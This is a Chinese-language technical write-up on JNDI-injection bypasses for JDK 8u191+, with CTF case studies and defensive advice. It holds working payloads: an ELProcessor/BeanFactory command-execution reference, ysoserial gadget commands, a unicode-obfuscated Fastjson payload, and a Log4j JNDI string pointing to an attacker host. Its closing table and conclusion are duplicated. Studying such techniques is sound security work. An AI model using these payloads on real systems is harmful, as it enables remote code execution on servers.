高版本JDK下的JNDI注入绕过技术研究<\/h1>

1. JNDI注入原理概述<\/h2>

JNDI (Java Naming and Directory Interface) 是Java提供的用于访问命名和目录服务的API，可以访问多种服务包括：<\/p>

DNS<\/li>
LDAP<\/li>
CORBA对象服务<\/li>

RMI<\/li> <\/ul>

1.1 RMI + JNDI注入流程<\/h3>

攻击者搭建RMI服务器，绑定恶意Reference对象到特定名称<\/li>
在恶意class文件目录下开启HTTP服务<\/li>
受害者通过JNDI客户端lookup查找RMI服务<\/li>

JNDI解析Reference对象并加载远程恶意类<\/li> <\/ol>

关键代码示例：<\/p>

InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>initialContext.<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:1099\/sayhello"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>1.2 LDAP + JNDI注入流程<\/h3>

攻击者搭建LDAP服务器，设置恶意Reference对象<\/li>
受害者通过JNDI查询LDAP服务<\/li>
JNDI解析LDAP返回的Reference对象<\/li>
加载并执行远程恶意类<\/li>
<\/ol>
2. 高版本JDK的限制机制<\/h2>
在JDK 8u191及更高版本中，Oracle引入了以下安全限制：<\/p>

com.sun.jndi.rmi.object.trustURLCodebase<\/code> 默认设置为false<\/li>
com.sun.jndi.cosnaming.object.trustURLCodebase<\/code> 默认设置为false<\/li>
禁止从远程codebase加载任意类<\/li>
<\/ol>
关键变化点：<\/p>

在javax.naming.spi.DirectoryManager.java<\/code>中增加了trustURLCodebase检查<\/li>
只有trustURLCodebase=true时才允许远程类加载<\/li>
<\/ul>
3. 高版本JDK下的绕过技术<\/h2>
3.1 利用本地Class作为Reference Factory<\/h3>
核心思路<\/strong>：利用受害者CLASSPATH中已有的类作为恶意Reference Factory<\/p>
关键类<\/strong>：org.apache.naming.factory.BeanFactory<\/code><\/p>
利用条件：<\/p>

目标环境包含Tomcat相关依赖<\/li>
BeanFactory类可用<\/li>
存在可利用的EL处理器（如javax.el.ELProcessor）<\/li>
<\/ol>
利用步骤<\/strong>：<\/p>

创建ResourceRef指向ELProcessor和BeanFactory<\/li>
通过forceString修改方法调用<\/li>
利用EL表达式执行命令<\/li>
<\/ol>
示例代码：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd', '\/c', 'calc']).start()\")"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>3.2 利用LDAP返回序列化数据触发本地Gadget<\/h3>
核心思路<\/strong>：利用LDAP返回序列化对象触发本地反序列化链<\/p>
利用条件<\/strong>：<\/p>

目标环境中存在可利用的反序列化Gadget<\/li>
可以控制LDAP服务器返回内容<\/li>
<\/ol>
利用步骤<\/strong>：<\/p>

准备恶意序列化数据（如CommonsCollections链）<\/li>
搭建LDAP服务器返回该序列化数据<\/li>
通过JNDI触发LDAP查询<\/li>
触发反序列化执行恶意代码<\/li>
<\/ol>
示例：<\/p>
\/\/ 生成CC6链的序列化数据
<\/span><\/span><\/span><\/span>java -<\/span>jar ysoserial.<\/span>jar<\/span> CommonsCollections6 "calc"<\/span> ><\/span> 1.<\/span>ser
<\/span><\/span>
<\/span><\/span>\/\/ 启动LDAP服务器返回该数据
<\/span><\/span><\/span><\/span>java -<\/span>jar LDAPServer.<\/span>jar<\/span> 127.0.0.1<\/span> 1.<\/span>ser
<\/span><\/span><\/code><\/pre>4. 实际案例分析<\/h2>
4.1 湖南邀请赛 - Login<\/h3>
环境特征<\/strong>：<\/p>

Fastjson 1.2.47<\/li>
JDK高版本（8u201+）<\/li>
存在unboundid-ldapsdk依赖<\/li>
<\/ul>
绕过过程<\/strong>：<\/p>

发现Fastjson入口但关键字被过滤<\/li>
使用Unicode\/Hex绕过关键字过滤<\/li>
由于高版本限制无法直接远程加载类<\/li>
利用LDAP返回CC6序列化数据触发反序列化<\/li>
<\/ol>
Payload<\/strong>：<\/p>
{
<\/span><\/span>  "username"<\/span>: {
<\/span><\/span>    "@\u0074\u0079\u0070\u0065"<\/span>: "java.lang.Class"<\/span>,
<\/span><\/span>    "val"<\/span>: "com.sun.rowset.\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"<\/span>
<\/span><\/span>  },
<\/span><\/span>  "password"<\/span>: {
<\/span><\/span>    "@\u0074\u0079\u0070\u0065"<\/span>: "com.sun.rowset.\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"<\/span>,
<\/span><\/span>    "\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065"<\/span>: "ldap:\/\/127.0.0.1:6666\/Evail"<\/span>,
<\/span><\/span>    "\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074"<\/span>: true<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 [HZNUCTF 2023 final]ezjava<\/h3>
环境特征<\/strong>：<\/p>

Log4j 2.x<\/li>
Fastjson 1.2.48<\/li>
JDK 1.8.0_222<\/li>
<\/ul>
利用链<\/strong>：<\/p>

通过Log4j触发JNDI注入<\/li>
由于JDK高版本限制无法直接远程加载类<\/li>
利用LDAP返回恶意序列化数据<\/li>
触发本地反序列化Gadget执行命令<\/li>
<\/ol>
关键步骤<\/strong>：<\/p>

准备Fastjson 1.2.83原生反序列化Payload<\/li>
使用LDAPServer返回该序列化数据<\/li>
通过Log4j触发JNDI查询<\/li>
<\/ol>
Payload<\/strong>：<\/p>
${jndi:ldap:\/\/attacker-ip:6666\/Evail}
<\/code><\/pre>
5. 防御建议<\/h2>

升级JDK到最新版本<\/li>
设置JVM参数限制JNDI访问：
-Dcom.sun.jndi.rmi.object.trustURLCodebase=false
-Dcom.sun.jndi.cosnaming.object.trustURLCodebase=false
<\/code><\/pre>
<\/li>
对用户输入进行严格过滤<\/li>
移除不必要的依赖（如unboundid-ldapsdk）<\/li>
使用安全框架对反序列化进行防护<\/li>
<\/ol>
6. 总结<\/h2>



攻击方式<\/th>
适用JDK版本<\/th>
依赖条件<\/th>
利用难度<\/th>
<\/tr>
<\/thead>


传统JNDI注入<\/td>
<8u191<\/td>
无<\/td>
低<\/td>
<\/tr>

本地Class绕过<\/td>
≥8u191<\/td>
需要特定本地类<\/td>
中<\/td>
<\/tr>

LDAP反序列化<\/td>
≥8u191<\/td>
需要反序列化Gadget<\/td>
高<\/td>
<\/tr>
<\/tbody>
<\/table>
高版本JDK环境下，JNDI注入仍然可能通过本地类利用或反序列化链触发，但利用条件更为苛刻。防御方应全面考虑各种可能的攻击面，而不仅仅是依赖JDK版本升级。<\/p>

攻击方式<\/th>	适用JDK版本<\/th>	依赖条件<\/th>	利用难度<\/th> <\/tr> <\/thead>
传统JNDI注入<\/td>	<8u191<\/td>	无<\/td>	低<\/td> <\/tr>
本地Class绕过<\/td>	≥8u191<\/td>	需要特定本地类<\/td>	中<\/td> <\/tr>
LDAP反序列化<\/td>	≥8u191<\/td>	需要反序列化Gadget<\/td>	高<\/td> <\/tr> <\/tbody> <\/table> 高版本JDK环境下，JNDI注入仍然可能通过本地类利用或反序列化链触发，但利用条件更为苛刻。防御方应全面考虑各种可能的攻击面，而不仅仅是依赖JDK版本升级。<\/p>